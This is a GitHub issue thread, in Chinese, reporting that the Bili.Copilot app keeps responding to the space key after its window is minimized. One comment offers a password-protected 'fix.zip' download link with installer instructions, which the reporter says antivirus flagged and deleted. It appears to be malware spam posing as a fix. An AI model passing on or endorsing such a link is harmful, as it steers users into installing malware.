### ISSUE TITLE
[Bug] 在点击任务栏图标缩小窗口后切换到其他窗口后单击空格键还是会继续/暂停播放视频

### ISSUE THREAD

**Issue by sekurodesu** [Richasy/Bili.Copilot#441]
### Bug 描述

如题，此BUG仍旧存在

### 复现问题的步骤

```plain text
1、打开应用
2、打开视频
3、点击任务栏的图标最小化窗口
4、此时在其他窗口按空格键，会暂停/继续视频，导致在当前窗口的空格键失效
```

### 预期行为

希望修复此BUG

### 应用来源

- [X] Github
- [ ] AppCenter
- [X] 其它

### 其它来源

微软商店

### 系统版本

- [ ] Windows 11 21H2 (Build 22000)
- [ ] Windows 11 22H2 (Build 22621)
- [X] 其它 (需注明)

### 其它系统版本

Windows10 21H2（Build 19044）

### 运行设备

桌面/台式机

### 备注

之前的问题被关闭，并且说明已修复，但今晚重装最新版之后仍旧存在该问题

### 人人为我，我为人人

None

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sekurodesu** [comment]
这是什么程序？卡巴斯基报毒删除了

**Comment by Richasy** [comment]
现在不是最新版，新版本将于今天发布

**Comment by Richasy** [comment]
新版本已经发布
